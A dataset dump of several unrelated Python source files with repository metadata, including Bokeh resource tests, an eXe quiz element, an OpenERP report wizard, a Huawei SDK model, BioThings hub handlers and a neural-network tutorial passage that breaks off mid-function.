95157c9156dc3020513173a363cd01d4530d332b | 498fd33fcb93ea53ae8b55565a3cfac0d80ad424 | /bokeh/tests/test_resources.py | 7ce32ce4690d703e8eb5b44383cfe9d63b561639 | [] | no_license | HyperionAnalytics/bokeh | c23104978988a507e08dcf70894258bcd3562274 | 7d889505a2ec069041dbfa3daf70395e473c3bac | refs/heads/master | 2020-04-06T06:27:08.442860 | 2014-08-26T14:29:06 | 2014-08-26T14:29:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,223 | py | import unittest
import bokeh
import bokeh.resources as resources
WRAPPER = """$(function() {
foo
});"""
WRAPPER_DEV = '''require(["jquery", "main"], function($, Bokeh) {
$(function() {
foo
});
});'''
class TestResources(unittest.TestCase):
def test_basic(self):
r = resources.Resources()
self.assertEqual(r.mode, "inline")
def test_module_attrs(self):
self.assertEqual(resources.CDN.mode, "cdn")
self.assertEqual(resources.INLINE.mode, "inline")
def test_inline(self):
r = resources.Resources(mode="inline")
self.assertEqual(r.mode, "inline")
self.assertEqual(r.dev, False)
self.assertEqual(len(r.js_raw), 1)
self.assertEqual(len(r.css_raw), 1)
self.assertEqual(r.messages, [])
def test_cdn(self):
resources.__version__ = "1.0"
r = resources.Resources(mode="cdn", version="1.0")
self.assertEqual(r.mode, "cdn")
self.assertEqual(r.dev, False)
self.assertEqual(r.js_raw, [])
self.assertEqual(r.css_raw, [])
self.assertEqual(r.messages, [])
resources.__version__ = "1.0-1-abc"
r = resources.Resources(mode="cdn", version="1.0")
self.assertEqual(r.messages, [
{'text': "Requesting CDN BokehJS version '1.0' from Bokeh development version '1.0-1-abc'. This configuration is unsupported and may not work!",
'type': 'warn'}
])
def test_server(self):
r = resources.Resources(mode="server")
self.assertEqual(r.mode, "server")
self.assertEqual(r.dev, False)
self.assertEqual(r.js_raw, [])
self.assertEqual(r.css_raw, [])
self.assertEqual(r.messages, [])
def test_server_dev(self):
r = resources.Resources(mode="server-dev")
self.assertEqual(r.mode, "server")
self.assertEqual(r.dev, True)
self.assertEqual(len(r.js_raw), 1)
self.assertEqual(r.css_raw, [])
self.assertEqual(r.messages, [])
def test_relative(self):
r = resources.Resources(mode="relative")
self.assertEqual(r.mode, "relative")
self.assertEqual(r.dev, False)
self.assertEqual(r.js_raw, [])
self.assertEqual(r.css_raw, [])
self.assertEqual(r.messages, [])
def test_relative_dev(self):
r = resources.Resources(mode="relative-dev")
self.assertEqual(r.mode, "relative")
self.assertEqual(r.dev, True)
self.assertEqual(len(r.js_raw), 1)
self.assertEqual(r.css_raw, [])
self.assertEqual(r.messages, [])
def test_absolute(self):
r = resources.Resources(mode="absolute")
self.assertEqual(r.mode, "absolute")
self.assertEqual(r.dev, False)
self.assertEqual(r.js_raw, [])
self.assertEqual(r.css_raw, [])
self.assertEqual(r.messages, [])
def test_absolute_dev(self):
r = resources.Resources(mode="absolute-dev")
self.assertEqual(r.mode, "absolute")
self.assertEqual(r.dev, True)
self.assertEqual(len(r.js_raw), 1)
self.assertEqual(r.css_raw, [])
self.assertEqual(r.messages, [])
def test_argument_checks(self):
self.assertRaises(ValueError, resources.Resources, "foo")
for mode in ("inline", "cdn", "server", "server-dev", "absolute", "absolute-dev"):
self.assertRaises(ValueError, resources.Resources, mode, root_dir="foo")
for mode in ("inline", "server", "server-dev", "relative", "relative-dev", "absolute", "absolute-dev"):
self.assertRaises(ValueError, resources.Resources, mode, version="foo")
for mode in ("inline", "cdn", "relative", "relative-dev", "absolute", "absolute-dev"):
self.assertRaises(ValueError, resources.Resources, mode, root_url="foo")
def test_js_wrapper(self):
for mode in ("inline", "server", "cdn", "relative", "absolute"):
r = resources.Resources(mode)
self.assertEqual(r.js_wrapper("foo"), WRAPPER)
for mode in ("server-dev", "relative-dev", "absolute-dev"):
r = resources.Resources(mode)
self.assertEqual(r.js_wrapper("foo"), WRAPPER_DEV)
| [
"bryanv@continuum.io"
] | bryanv@continuum.io |
76cd8a5c69e8f31902f6c1f1bcebb1090e76716d | 24d8cf871b092b2d60fc85d5320e1bc761a7cbe2 | /eXe/rev3426-3457/left-trunk-3457/exe/webui/truefalseelement.py | f15603272a78cf3bc88de0f0603722b248534298 | [] | no_license | joliebig/featurehouse_fstmerge_examples | af1b963537839d13e834f829cf51f8ad5e6ffe76 | 1a99c1788f0eb9f1e5d8c2ced3892d00cd9449ad | refs/heads/master | 2016-09-05T10:24:50.974902 | 2013-03-28T16:28:47 | 2013-03-28T16:28:47 | 9,080,611 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 7,531 | py | """
TrueFalseElement is responsible for a block of question. Used by TrueFalseBlock.
"""
import logging
from exe.webui import common
from exe.webui.element import TextAreaElement
log = logging.getLogger(__name__)
class TrueFalseElement(object):
    """
    TrueFalseElement is responsible for a block of question.
    Used by TrueFalseBlock.
    """
    def __init__(self, index, idevice, question):
        """
        Initialize
        """
        self.index = index
        self.id = unicode(index) + "b" + idevice.id
        self.idevice = idevice
        self.question = question
        # Make sure each rich-text field knows which iDevice it belongs to.
        if question.questionTextArea.idevice is None:
            question.questionTextArea.idevice = idevice
        if question.feedbackTextArea.idevice is None:
            question.feedbackTextArea.idevice = idevice
        if question.hintTextArea.idevice is None:
            question.hintTextArea.idevice = idevice
        self.question_question = TextAreaElement(question.questionTextArea)
        self.question_feedback = TextAreaElement(question.feedbackTextArea)
        self.question_hint = TextAreaElement(question.hintTextArea)
        # Form-field ids used to route request arguments back to the
        # matching sub-element in process().
        self.questionId = "question"+ unicode(index) + "b" + idevice.id
        self.question_question.id = self.questionId
        self.feedbackId = "feedback" + unicode(index) + "b" + idevice.id
        self.question_feedback.id = self.feedbackId
        self.hintId = "hint" + unicode(index) + "b" + idevice.id
        self.question_hint.id = self.hintId
        self.keyId = "Key" + unicode(index) + "b" + idevice.id

    def process(self, request):
        """
        Process arguments from the web server. Return any which apply to this
        element.
        """
        log.debug("process " + repr(request.args))
        if self.questionId in request.args:
            self.question_question.process(request)
        if self.hintId in request.args:
            self.question_hint.process(request)
        if self.keyId in request.args:
            # The radio group posts the string "true"/"false".
            if request.args[self.keyId][0] == "true":
                self.question.isCorrect = True
                log.debug("question " + repr(self.question.isCorrect))
            else:
                self.question.isCorrect = False
        if self.feedbackId in request.args:
            self.question_feedback.process(request)
        if "action" in request.args and request.args["action"][0] == self.id:
            # Deleting this question: strip internal links first, then remove.
            for q_field in self.question.getRichTextFields():
                q_field.ReplaceAllInternalAnchorsLinks()
                q_field.RemoveAllInternalLinks()
            self.idevice.questions.remove(self.question)

    def renderEdit(self):
        """
        Returns an XHTML string for editing this option element
        """
        html = self.question_question.renderEdit()
        html += _("True") + " "
        html += common.option(self.keyId, self.question.isCorrect, "true")
        html += _("False") + " "
        html += common.option(self.keyId, not self.question.isCorrect, "false")
        html += "<br/><br/>\n"
        html += common.elementInstruc(self.idevice.keyInstruc)
        html += self.question_feedback.renderEdit()
        html += self.question_hint.renderEdit()
        html += common.submitImage(self.id, self.idevice.id,
                                   "/images/stock-cancel.png",
                                   _("Delete question"))
        html += "<br/><br/>\n"
        return html

    def renderQuestionView(self):
        """
        Returns an XHTML string for viewing this question element
        """
        is_preview = 0
        html = self.renderQuestion(is_preview)
        # NOTE: fixed the deprecated Python 2 "<>" operator ("!=" is the
        # equivalent, supported spelling).
        if self.question.hintTextArea.content != "":
            html += u'<span '
            html += u'style="background-image:url(\'panel-amusements.png\');">'
            html += u'\n<a onmousedown="Javascript:updateCoords(event);'
            html += u'showMe(\'%s\', 350, 100);" ' % self.hintId
            html += u'style="cursor:help;align:center;vertical-align:middle;" '
            html += u'title="%s" \n' % _(u"Hint")
            html += u'href="javascript:void(0);"> </a>'
            html += u'</span>'
            html += u'<div id="'+self.hintId+'" '
            html += u'style="display:none; z-index:99;">'
            html += u'<div style="float:right;" >'
            html += u'<img alt="%s" ' % _('Close')
            html += u'src="stock-stop.png" title="%s"' % _('Close')
            html += u" onmousedown=\"Javascript:hideMe();\"/></div>"
            html += u'<div class="popupDivLabel">'
            html += _(u"Hint")
            html += u'</div>\n'
            html += self.question_hint.renderView()
            html += u"</div>\n"
        return html

    def renderQuestionPreview(self):
        """
        Returns an XHTML string for previewing this question element
        """
        is_preview = 1
        html = self.renderQuestion(is_preview)
        html += " \n"
        html += common.elementInstruc(self.question_hint.field.content,
                                      "panel-amusements.png", "Hint")
        return html

    def renderQuestion(self, is_preview):
        """
        Returns an XHTML string for viewing and previewing this question element
        """
        log.debug("renderPreview called in the form of renderQuestion")
        html = u"<br/><br/>"
        if is_preview:
            html += self.question_question.renderPreview() + "<br/>"
        else:
            html += self.question_question.renderView() + "<br/>"
        html += _("True") + " "
        html += self.__option(0, 2, "true") + " \n"
        html += _("False") + " "
        html += self.__option(1, 2, "false") + "\n"
        return html

    def __option(self, index, length, true):
        """Add a option input"""
        html = u'<input type="radio" name="option%s" ' % self.id
        html += u'id="%s%s" ' % (true, self.id)
        html += u'onclick="getFeedback(%d,%d,\'%s\',\'truefalse\')"/>' % (
            index, length, self.id)
        return html

    def renderFeedbackPreview(self):
        """
        Merely a front-end to renderFeedbackView(), setting preview mode.
        Note: this won't really matter all that much, since these won't yet
        show up in exported printouts, BUT the image paths will be correct.
        """
        return self.renderFeedbackView(is_preview=True)

    def renderFeedbackView(self, is_preview=False):
        """
        return xhtml string for display this option's feedback
        """
        feedbackStr1 = _(u"Correct!") + " "
        feedbackStr2 = _(u"Incorrect!") + " "
        # If "False" is the correct answer, swap the two feedback strings so
        # that slot 0 ("true") shows "Incorrect!" and slot 1 shows "Correct!".
        if not self.question.isCorrect:
            feedbackStr1, feedbackStr2 = feedbackStr2, feedbackStr1
        feedbackId1 = "0" + "b" + self.id
        feedbackId2 = "1" + "b" + self.id
        html = u'<div id="s%s" style="color: rgb(0, 51, 204);' % feedbackId1
        html += u'display: none;">'
        html += feedbackStr1 + '</div>\n'
        html += u'<div id="s%s" style="color: rgb(0, 51, 204);' % feedbackId2
        html += u'display: none;">'
        html += feedbackStr2 + '</div>\n'
        html += u'<div id="sfbk%s" style="color: rgb(0, 51, 204);' % self.id
        html += u'display: none;">'
        if is_preview:
            html += self.question_feedback.renderPreview()
        else:
            html += self.question_feedback.renderView()
        html += u'</div>\n'
        return html
| [
"joliebig@fim.uni-passau.de"
] | joliebig@fim.uni-passau.de |
ea506ef01a97b930d0c98568de59edafa60481e6 | 7c7a0c7a3c52f1c3b8a504a7ed671647695137e0 | /venv/Scripts/pip-script.py | df90d1ed47de1a88d92f27de1c497534c8d75080 | [] | no_license | mdShakilHossainNsu2018/official_django | 6fd7ee8673c35ddcd1f9d5a89fac4f32b19ac27c | bfb1bbd198888abcd84dffc4d7e83faeb448b1e2 | refs/heads/master | 2022-04-26T10:37:05.521377 | 2020-04-29T21:20:29 | 2020-04-29T21:20:29 | 259,578,229 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 419 | py | #!C:\Users\shaki\PycharmProjects\official_django\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip')()
)
| [
"shakilnsu2018@gmail.com"
] | shakilnsu2018@gmail.com |
9b17f09e95d1c31eb22816739bc460fffcf1885d | 21f98d8bb31264c94e7a98fb8eb806d7f5bd396e | /322_Coin_Change.py | 78e841de38e65f2f56347f24746e9b37d96a52fe | [] | no_license | mcfair/Algo | e1500d862a685e598ab85e8ed5b68170632fdfd0 | 051e2a9f6c918907cc8b665353c46042e7674e66 | refs/heads/master | 2021-10-31T01:25:46.917428 | 2021-10-08T04:52:44 | 2021-10-08T04:52:44 | 141,460,584 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 513 | py | class Solution(object):
def coinChange(self, coins, amount):
"""
:type coins: List[int]
:type amount: int
:rtype: int
"""
#unlimited coin change
#need[b] := #of coins to make a change 'b'
need =[0] + [float('inf')]*amount
for c in coins:
for b in range(c, amount+1):
need[b] = min(need[b], need[b-c]+1)
return need[amount] if need[amount] < float('inf') else -1
| [
"noreply@github.com"
] | mcfair.noreply@github.com |
23df93d317d5228698133b7e6d3e0235c71ba6cc | 5bd5de114f8a0721cee58bb3eb9d993095fd0876 | /stock_custom/wizard_product_mutation.py | 9261875ecf31147486afcafadbedbf20feee8f14 | [] | no_license | hendrasaputra0501/o7kite_dmst | 35ce25494cf536873f3b6eaffc4a78bf02ddeb42 | e8ea609541b831511ba1f3f688d97732dfa879da | refs/heads/master | 2020-04-25T01:31:33.471461 | 2019-02-25T01:48:07 | 2019-02-25T01:48:07 | 172,410,746 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,857 | py | from openerp.osv import fields,osv
import openerp.addons.decimal_precision as dp
from tools.translate import _
from lxml import etree
from openerp.osv.orm import setup_modifiers
from datetime import datetime
import time
class wizard_product_mutation(osv.osv_memory):
    # Extends the transient model "wizard.product.mutation" (OpenERP-style
    # osv_memory) with two actions: open the mutation report as a tree view,
    # or export it to Excel.
    _inherit = "wizard.product.mutation"

    def action_open_window(self, cr, uid, ids, context=None):
        """ To open products mutation to given duration/period
            @param self: The object pointer.
            @param cr: A database cursor
            @param uid: ID of the user currently logged in
            @param ids: An ID or list of IDs (but only the first ID will be processed)
            @param context: A standard dictionary
            @return: dictionary of action act_window product
        """
        if context is None:
            context = {}
        wizard = self.read(cr, uid, ids, ['from_date', 'to_date','product_type'], context=context)
        if wizard:
            data_obj = self.pool.get('ir.model.data')
            domain = []
            # Pick the target model and the tree view that matches the chosen
            # product type; the generic branch restricts products by type.
            if wizard[0]['product_type']=='finish_good':
                res_model = 'product.blend'
                result = data_obj._get_id(cr, uid, 'stock_custom', 'view_product_blend_tree2_mutation')
            elif wizard[0]['product_type']=='raw_material':
                res_model = 'product.rm.category'
                result = data_obj._get_id(cr, uid, 'stock_custom', 'view_product_rm_category_tree2_mutation')
            else:
                res_model = 'product.product'
                result = data_obj._get_id(cr, uid, 'master_data_custom', 'view_product_tree2_mutation')
                domain = [('product_type','=',wizard[0]['product_type']),('type','<>','service')]
            view_id = data_obj.browse(cr, uid, result).res_id
            # Expand the bare dates to full-day datetime bounds
            # (00:00:00 .. 23:59:59) before passing them via context.
            from_date = wizard[0]['from_date']!=False and \
                    datetime.strptime(wizard[0]['from_date'],'%Y-%m-%d').strftime('%Y-%m-%d 00:00:00') or False
            to_date = wizard[0]['to_date'] and \
                    datetime.strptime(wizard[0]['to_date'],'%Y-%m-%d').strftime('%Y-%m-%d 23:59:59') or False
            return {
                'name': _('Laporan Pertanggungjawaban Mutasi'),
                'view_type': 'form',
                'view_mode': 'tree',
                'res_model': res_model,
                'view_id':[view_id],
                'type': 'ir.actions.act_window',
                'context': {'from_date': from_date or False,
                            'to_date': to_date or False,},
                "domain":domain,
            }

    def export_excel(self, cr, uid, ids, context=None):
        # Builds an ir.actions.report.xml action that renders the mutation
        # report as XLS; the report name depends on the product type.
        if context is None:
            context = {}
        wizard = self.browse(cr,uid,ids,context)[0]
        datas = {
            'model': 'wizard.product.mutation',
            'from_date' : wizard.from_date,
            'to_date' : wizard.to_date,
            'product_type':wizard.product_type,
        }
        if wizard.product_type=='finish_good':
            report_name = 'blend.mutation.report.xls'
        elif wizard.product_type=='raw_material':
            report_name = 'rm.categ.mutation.report.xls'
        else:
            report_name = 'product.mutation.report.xls'
        return {
            'type': 'ir.actions.report.xml',
            'report_name': report_name,
            'report_type': 'xls',
            'datas': datas,
        }
wizard_product_mutation() | [
"hendrasaputra0501@gmail.com"
] | hendrasaputra0501@gmail.com |
8a84fe7bc3c0fc0894fde1bfc9b969fb327fa136 | 34de2b3ef4a2478fc6a03ea3b5990dd267d20d2d | /Python/_python_modules/unittest/fibonacci.py | e9cb48c6099d63569124520d21159f163deb6452 | [
"MIT"
] | permissive | bhishanpdl/Programming | d4310f86e1d9ac35483191526710caa25b5f138e | 9654c253c598405a22cc96dfa1497406c0bd0990 | refs/heads/master | 2020-03-26T06:19:01.588451 | 2019-08-21T18:09:59 | 2019-08-21T18:09:59 | 69,140,073 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 496 | py | #!python
# -*- coding: utf-8 -*-
#
# Author : Bhishan Poudel, Physics PhD Student, Ohio University
# Date : Jul 21, 2017 Fri
# Last update :
#
# Imports
import doctest
def fib(n):
    """
    Calculates the n-th Fibonacci number iteratively

    >>> fib(0)
    0
    >>> fib(1)
    1
    >>> fib(10)
    55
    >>> fib(15)
    610
    >>>
    """
    # Fixed doctest: fib(15) is 610, not 6100 — the original expected
    # value made doctest.testmod() fail.
    a, b = 0, 1
    for i in range(n):
        a, b = b, a + b
    return a


if __name__ == "__main__":
    doctest.testmod()
| [
"bhishantryphysics@gmail.com"
] | bhishantryphysics@gmail.com |
59448244030550a58a263906206bc941679ee131 | be084131635850062abd17cdb037e1161725f56c | /Wrapping/Python/vtkvtg/hybrid.py | 04d45a20d6423b8e7e85073c18afbe7c0ddb846e | [] | no_license | emonson/vtkVTG | 177a80820e27aad7fc9fb1d7b14cee4155166d00 | 767f35ae18142133f7ffd1a9ea6c22dfd59acac7 | refs/heads/master | 2016-09-10T00:53:25.613217 | 2012-06-05T14:45:12 | 2012-06-05T14:45:12 | 699,786 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 235 | py | """ This module loads all the classes from the VTK Hybrid library into its
namespace. This is a required module."""
import os
if os.name == 'posix':
from libvtkvtgHybridPython import *
else:
from vtkvtgHybridPython import *
| [
"emonson@cs.duke.edu"
] | emonson@cs.duke.edu |
a665cbf59a3147d170e05d21793e326740771fb1 | f9d564f1aa83eca45872dab7fbaa26dd48210d08 | /huaweicloud-sdk-iotanalytics/huaweicloudsdkiotanalytics/v1/model/node_content_req.py | 7ecc68c267ff4a458e37e65c2f437fbb9f4b3b61 | [
"Apache-2.0"
] | permissive | huaweicloud/huaweicloud-sdk-python-v3 | cde6d849ce5b1de05ac5ebfd6153f27803837d84 | f69344c1dadb79067746ddf9bfde4bddc18d5ecf | refs/heads/master | 2023-09-01T19:29:43.013318 | 2023-08-31T08:28:59 | 2023-08-31T08:28:59 | 262,207,814 | 103 | 44 | NOASSERTION | 2023-06-22T14:50:48 | 2020-05-08T02:28:43 | Python | UTF-8 | Python | false | false | 3,960 | py | # coding: utf-8
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class NodeContentReq:
    # Auto-generated Huawei Cloud SDK request model (IoT Analytics v1):
    # a plain data holder with OpenAPI metadata for (de)serialization.
    """
    Attributes:
        openapi_types (dict): The key is attribute name
                              and the value is attribute type.
        attribute_map (dict): The key is attribute name
                              and the value is json key in definition.
    """
    # Attribute names whose values must be masked in to_dict() output.
    sensitive_list = []

    openapi_types = {
        'site_id': 'str',
        'sqllist': 'list[str]'
    }

    attribute_map = {
        'site_id': 'site_id',
        'sqllist': 'sqllist'
    }

    def __init__(self, site_id=None, sqllist=None):
        """NodeContentReq

        The model defined in huaweicloud sdk

        :param site_id: Node instance ID
        :type site_id: str
        :param sqllist: List of SQL statements that forward digital-twin model
            instance data from the given edge platform node to the central
            platform node.
        :type sqllist: list[str]
        """
        self._site_id = None
        self._sqllist = None
        self.discriminator = None
        self.site_id = site_id
        self.sqllist = sqllist

    @property
    def site_id(self):
        """Gets the site_id of this NodeContentReq.

        Node instance ID

        :return: The site_id of this NodeContentReq.
        :rtype: str
        """
        return self._site_id

    @site_id.setter
    def site_id(self, site_id):
        """Sets the site_id of this NodeContentReq.

        Node instance ID

        :param site_id: The site_id of this NodeContentReq.
        :type site_id: str
        """
        self._site_id = site_id

    @property
    def sqllist(self):
        """Gets the sqllist of this NodeContentReq.

        List of SQL statements forwarding digital-twin model instance data
        from the edge node to the central platform node.

        :return: The sqllist of this NodeContentReq.
        :rtype: list[str]
        """
        return self._sqllist

    @sqllist.setter
    def sqllist(self, sqllist):
        """Sets the sqllist of this NodeContentReq.

        List of SQL statements forwarding digital-twin model instance data
        from the edge node to the central platform node.

        :param sqllist: The sqllist of this NodeContentReq.
        :type sqllist: list[str]
        """
        self._sqllist = sqllist

    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}
        # Recursively convert nested models/lists/dicts; mask attributes
        # listed in sensitive_list.
        for attr, _ in six.iteritems(self.openapi_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                if attr in self.sensitive_list:
                    result[attr] = "****"
                else:
                    result[attr] = value
        return result

    def to_str(self):
        """Returns the string representation of the model"""
        import simplejson as json
        if six.PY2:
            # Python 2 only: force UTF-8 default encoding before dumping.
            import sys
            reload(sys)
            sys.setdefaultencoding("utf-8")
        return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)

    def __repr__(self):
        """For `print`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, NodeContentReq):
            return False
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
| [
"hwcloudsdk@huawei.com"
] | hwcloudsdk@huawei.com |
3f23307214e7a4e5dcc595c860deb926e71ab218 | 7437e6b58750275933939321b6b9dc5eb6891a1c | /biothings/hub/api/handlers/source.py | 0750920b7dd125ff13da9436d4c14eedf13e5bc6 | [
"Apache-2.0"
] | permissive | Quiltomics/biothings.api | b6caa939a90e0fd1db35124b64ecdc34babdf5c7 | ab54243e8833888e0331a988a2a13907d17442ad | refs/heads/master | 2020-04-23T12:54:16.731641 | 2019-02-16T17:43:28 | 2019-02-16T19:07:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,801 | py | import asyncio
import logging
import tornado.web
from collections import OrderedDict
from .base import BaseHandler
from biothings.utils.dataload import to_boolean
class SourceHandler(BaseHandler):
    """Expose data-source information (dump and upload state) over HTTP."""

    def sumup_source(self, src):
        """Return minimal info about src"""
        # Keep insertion order so the JSON output is stable/predictable.
        mini = OrderedDict()
        mini["name"] = src["name"]
        mini["release"] = src.get("release")
        if src.get("download"):
            mini["download"] = {
                "status": src["download"].get("status"),
                "time": src["download"].get("time"),
                "started_at": src["download"].get("started_at")
            }
            mini["download"]["dumper"] = src["download"].get("dumper", {})
            if src["download"].get("err"):
                mini["download"]["error"] = src["download"]["err"]
        count = 0
        if src.get("upload"):
            mini["upload"] = {}
            all_status = set()
            if len(src["upload"]["jobs"]) > 1:
                # Several upload jobs: summarize each one, then derive a
                # global status (unanimous status, or "uploading" if any
                # job is still running).
                for job, info in src["upload"]["jobs"].items():
                    mini["upload"][job] = {
                        "time": info.get("time"),
                        "status": info.get("status"),
                        "count": info.get("count"),
                        "started_at": info.get("started_at")
                    }
                    count += info.get("count") or 0
                    all_status.add(info["status"])
                if len(all_status) == 1:
                    mini["upload"]["status"] = all_status.pop()
                elif "uploading" in all_status:
                    mini["upload"]["status"] = "uploading"
            else:
                # Single job: its status is the global status.
                job, info = list(src["upload"]["jobs"].items())[0]
                mini["upload"][job] = {
                    "time": info.get("time"),
                    "status": info.get("status"),
                    "count": info.get("count"),
                    "started_at": info.get("started_at")
                }
                count += info.get("count") or 0
                mini["upload"]["status"] = info.get("status")
            if src["upload"].get("err"):
                mini["upload"]["error"] = src["upload"]["err"]
        if src.get("locked"):
            mini["locked"] = src["locked"]
        mini["count"] = count
        return mini

    def get_sources(self, debug=False):
        """Return the list of all sources known to the dump/upload managers.

        When debug is True, raw source info is returned instead of the
        summarized form.
        """
        dm = self.managers.get("dump_manager")
        um = self.managers.get("upload_manager")
        sources = {}
        if dm:
            srcs = dm.source_info()
            if debug:
                for src in srcs:
                    sources[src["name"]] = src
            else:
                for src in srcs:
                    sources[src["name"]] = self.sumup_source(src)
        # complete with uploader info
        if um:
            srcs = um.source_info()
            dsrcs = {src["name"]: src for src in srcs}
            for src_name in um.register.keys():
                # collection-only source don't have dumpers and only exist in
                # the uploader manager
                up_info = dsrcs.get(src_name, {"name": src_name})
                # NOTE(review): dm.register is accessed here even when dm is
                # falsy — presumably um implies dm in practice; confirm.
                if src_name not in dm.register:
                    sources[src_name] = self.sumup_source(up_info)
                if up_info.get("upload"):
                    for subname in up_info["upload"].get("jobs", {}):
                        sources[up_info["name"]].setdefault("upload", {}).setdefault(subname, {})
                        sources[up_info["name"]]["upload"][subname]["uploader"] = \
                                up_info["upload"]["jobs"][subname]["uploader"]
        return list(sources.values())

    def get_source(self, name, debug=False):
        """Return info for a single source, or raise 404/500."""
        dm = self.managers.get("dump_manager")
        um = self.managers.get("upload_manager")
        m = dm or um  # whatever available
        if m:
            src = m.source_info(name)
            if not src:
                raise tornado.web.HTTPError(404, reason="No such datasource")
            else:
                return src
        else:
            raise tornado.web.HTTPError(500, reason="No manager available to fetch information")

    @asyncio.coroutine
    def get(self, name=None):
        """GET /source[/name][?debug=...] — one source or all of them."""
        debug = to_boolean(self.get_query_argument("debug", False))
        if name:
            self.write(self.get_source(name, debug))
        else:
            self.write(self.get_sources(debug))
class DumpSourceHandler(BaseHandler):
    """POST /dump/<name>: trigger a dump of the named data source."""

    def post(self, name):
        manager = self.managers.get("dump_manager")
        manager.dump_src(name)
        self.write({"dump": name})
class UploadSourceHandler(BaseHandler):
    """POST /upload/<name>: trigger an upload of the named data source."""

    def post(self, name):
        manager = self.managers.get("upload_manager")
        manager.upload_src(name)
        self.write({"upload": name})
| [
"slelong@scripps.edu"
] | slelong@scripps.edu |
4f69bce313f30ba5697091f2746782807a09ad1d | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/adjectives/_winded.py | a4f8fd77780cbfc22bfc25f69c08d1918a504218 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 460 | py |
#calss header
class _WINDED():
def __init__(self,):
self.name = "WINDED"
self.definitions = [u'temporarily unable to breathe, either when hit in the stomach or after taking hard physical exercise: ']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'adjectives'
def run(self, obj1, obj2):
self.jsondata[obj2] = {}
self.jsondata[obj2]['properties'] = self.name.lower()
return self.jsondata
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
feadd1b682627b154efe8b4af6e59c03c941920b | c0344beb70872a4efb097fa3cf39cc1e8d01dd89 | /neural_networks_from_scratch/chap_2.py | a134de791eedf26841bc93dd12ee68e466930106 | [] | no_license | szhongren/nnfs | cb3b819a509545cf7d5d78e18b053b0a238d4f8a | 8e6783745d0d42dcf50f2347d5175857bf290890 | refs/heads/main | 2023-02-16T04:22:04.734752 | 2020-12-11T02:47:01 | 2020-12-11T02:47:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,313 | py | import numpy as np
def main():
    print("chap_2")
    demos = (
        single_neuron,
        single_neuron_alt,
        three_neurons,
        three_neurons_loop,
        dot_product,
        single_neuron_numpy,
        three_neurons_numpy,
        matrix_product,
        three_neurons_batched_numpy,
    )
    # Run every chapter-2 demo in order, then print a separator line.
    for demo in demos:
        demo()
    print("=" * 100)
def single_neuron():
    # One neuron with three inputs: weighted sum of the inputs plus a bias.
    inputs = [1, 2, 3]
    weights = [0.2, 0.8, -0.5]
    bias = 2
    outputs = sum(value * weight for value, weight in zip(inputs, weights)) + bias
    print(outputs)
def single_neuron_alt():
    # Same single-neuron computation, now with four inputs/weights.
    inputs = [1.0, 2.0, 3.0, 2.5]
    weights = [0.2, 0.8, -0.5, 1.0]
    bias = 2.0
    outputs = sum(value * weight for value, weight in zip(inputs, weights)) + bias
    print(outputs)
def three_neurons():
    # A layer of three neurons sharing the same four inputs.
    inputs = [1, 2, 3, 2.5]
    weights1 = [0.2, 0.8, -0.5, 1]
    weights2 = [0.5, -0.91, 0.26, -0.5]
    weights3 = [-0.26, -0.27, 0.17, 0.87]
    bias1 = 2
    bias2 = 3
    bias3 = 0.5
    # One weighted sum per neuron, in the same order as before.
    outputs = [
        sum(value * weight for value, weight in zip(inputs, ws)) + b
        for ws, b in ((weights1, bias1), (weights2, bias2), (weights3, bias3))
    ]
    print(outputs)
def three_neurons_loop():
    # Same three-neuron layer, weights stored as a matrix and processed
    # row by row.
    inputs = [1, 2, 3, 2.5]
    weights = [
        [0.2, 0.8, -0.5, 1],
        [0.5, -0.91, 0.26, -0.5],
        [-0.26, -0.27, 0.17, 0.87],
    ]
    biases = [2, 3, 0.5]
    layer_outputs = []
    for neuron_weights, neuron_bias in zip(weights, biases):
        # Weighted sum of the inputs, then the bias (same accumulation
        # order as an explicit += loop starting from 0).
        total = sum(x * w for x, w in zip(inputs, neuron_weights)) + neuron_bias
        layer_outputs.append(total)
    print(layer_outputs)
def dot_product():
    # Plain-Python dot product of two integer vectors.
    a = [1, 2, 3]
    b = [2, 3, 4]
    print(sum(x * y for x, y in zip(a, b)))
def single_neuron_numpy():
    # Same single-neuron computation via np.dot (lists are coerced to arrays).
    inputs = [1.0, 2.0, 3.0, 2.5]
    weights = [0.2, 0.8, -0.5, 1.0]
    bias = 2.0
    print(np.dot(weights, inputs) + bias)
def three_neurons_numpy():
